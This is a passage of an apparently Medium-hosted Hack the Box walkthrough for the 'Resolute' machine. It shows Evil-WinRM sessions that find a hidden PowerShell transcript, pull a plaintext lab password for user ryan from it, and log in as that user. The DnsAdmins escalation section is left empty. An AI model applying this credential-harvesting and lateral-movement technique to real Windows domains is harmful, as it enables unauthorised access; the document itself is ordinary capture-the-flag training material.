Hack the Box: Resolute

Resolute

User

Nmap scan reveals an AD server:

Privlege escalation

Gaining SYSTEM privleges can be divided in two stages. First, it’s needed to move lateraly to Ryan user. Then escalate that access to SYSTEM.

Ryan user

Listing content of C: root reveals an interesting hidden folder PSTranscripts:

*Evil-WinRM* PS C:\> dir -forceDirectory: C:\Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 12/13/2019 7:14 AM 402653184 pagefile.sys
*Evil-WinRM* PS C:\Pstranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt-- snip --
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
# ruby evil-winrm/evil-winrm.rb -i resolute.htb -u ryan
Enter Password:
Evil-WinRM shell v2.0Info: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
megabank\ryan

SYSTEM privleges

Ryan user is a member o a group DnsAdmins:

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store